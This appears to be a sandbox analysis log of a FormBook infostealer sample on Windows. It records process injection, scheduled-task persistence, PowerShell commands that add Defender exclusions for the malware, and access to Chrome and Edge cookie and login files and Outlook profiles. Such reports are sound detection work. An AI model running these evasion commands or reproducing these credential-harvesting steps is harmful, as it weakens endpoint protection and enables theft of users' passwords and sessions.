Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateUserProcess: Direct from: 0x76F0371C

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Memory written: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: NULL target: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe protection: execute and read and write
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe protection: read write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Thread register set: target process: 7468

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Thread APC queued: target process: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Users\user\Desktop\FGGx944Qu7.exe VolumeInformation
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
